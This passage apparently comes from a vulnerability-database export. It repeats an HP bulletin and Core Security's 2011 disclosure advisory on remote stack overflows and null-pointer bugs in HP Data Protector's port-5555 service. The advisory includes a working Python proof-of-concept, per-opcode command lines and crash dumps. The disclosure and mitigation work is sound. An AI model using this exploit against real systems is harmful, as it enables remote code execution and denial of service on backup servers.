subsequent\r\n2. Enable encrypted control communication services on cell server and all clients in cell\r\n\r\nThe upgrade is available for download from http://hp.com/go/dataprotector then under 'Product\r\nInformation' click on 'Trials and Demos'.\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 28 June 2011 Initial release\r\nVersion: 2 (rev.2) - 28 June 2011 Updated attribution\r\nVersion: 3 (rev.3) - 29 June 2011 Corrected CVSS data\r\n\r\nhird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch\r\nmanagement policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email\r\nto: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be\r\nencrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:\r\nhttps://h41183.www4.hp.com/signup_alerts.php?lang=en&cc=US&prodSeriesId=&jumpid=hpsc_secbulletins\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\n 3C = 3COM\r\n 3P = 3rd Party Software\r\n GN = HP General Software\r\n HF = HP Hardware and Firmware\r\n MP = MPE/iX\r\n MU = Multi-Platform Software\r\n NS = NonStop Servers\r\n OV = OpenVMS\r\n PI = Printing and Imaging\r\n PV = ProCurve\r\n ST = Storage Software\r\n TU = Tru64 UNIX\r\n UX = HP-UX\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system\r\nintegrity. HP is continually reviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users\r\nof the affected HP products the important security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this information to their individual\r\nsituations and take appropriate action. HP does not warrant that this information is\r\nnecessarily accurate or complete for all user situations and, consequently, HP will not be\r\nresponsible for any damages resulting from user's use or disregard of the information provided\r\nin this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express\r\nor implied, including the warranties of merchantability and fitness for a particular purpose,\r\ntitle and non-infringement."\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions\r\ncontained herein. The information provided is provided "as is" without warranty of any kind. \r\nTo the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will\r\nbe liable for incidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or services; or damages for\r\nloss of data, or software restoration. The information in this document is subject to change\r\nwithout notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4Lun4ACgkQ4B86/C0qfVlnbQCgrHWQHFYB5Gux1C5M7OiPW+Q+\r\n2XUAn3tiNudYuuArpTtX4IQdOA/G1a4f\r\n=BrzP\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26620", "title": "[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\xff\xfe\x32\x00\x00\x00"]\r\n\r\nfor s in args:\r\n packet.append("\x20\x00" + s + "\x00\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26621", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26621", "title": "CORE-2011-0514: Multiple vulnerabilities in HP Data Protector", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "Multiple vulnerabilities in TCP/5555 service.", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:VULN:11768", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11768", "title": "HP OpenView Storage Data Protector multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T15:46:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1865"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71823", "id": "SSV:71823", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\\xff\\xfe\\x32\\x00\\x00\\x00"]\r\n\r\nfor s in args:\r\n packet.append("\\x20\\x00" + s + "\\x00\\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71823"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - Multiple Vulnerabilities", "edition": 1, "published": "2011-06-29T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EXPLOITPACK:357E2A5253FECAF999A26172A2781370", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - Corelabs Advisory\n http://corelabs.coresecurity.com/\n\n Multiple vulnerabilities in HP Data Protector\n\n\n1. *Advisory Information*\n\nTitle: Multiple vulnerabilities in HP Data Protector\nAdvisory ID: CORE-2011-0514\nAdvisory URL:\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\nDate published: 2011-06-29\nDate of last update: 2011-06-29\nVendors contacted: HP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Remote stack overflow [CWE-120], Null pointer dereference\n[CWE-476], Improper input validation [CWE-20]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\n\n\n3. *Vulnerability Description*\n\nHP Data Protector [1] is an automated backup and recovery software for\nsingle-server to enterprise environments. Multiple vulnerabilities have\nbeen found in HP Data Protector that could allow a remote attacker to\nexecute arbitrary code and lead to denial of service conditions. The\nvulnerabilities are triggered by sending a request to port 5555 of a\nhost running the \"data protector inet\" service, part of HP Data\nProtector. The request has several parameters, including an opcode. By\nsending requests with specially crafted parameters, the different bugs\ncan be triggered.\n\n\n4. *Vulnerable packages*\n\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\n . Previous versions may be affected, but were not tested.\n\n\n5. *Non-vulnerable packages*\n\n . No fixes are available at the time of publication.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nHP has issued a security bulletin with document ID c02872182 [2]\navailable through HP Support Center at http://www.hp.com/go/HPSC.\n\nThe latest version of HP Data 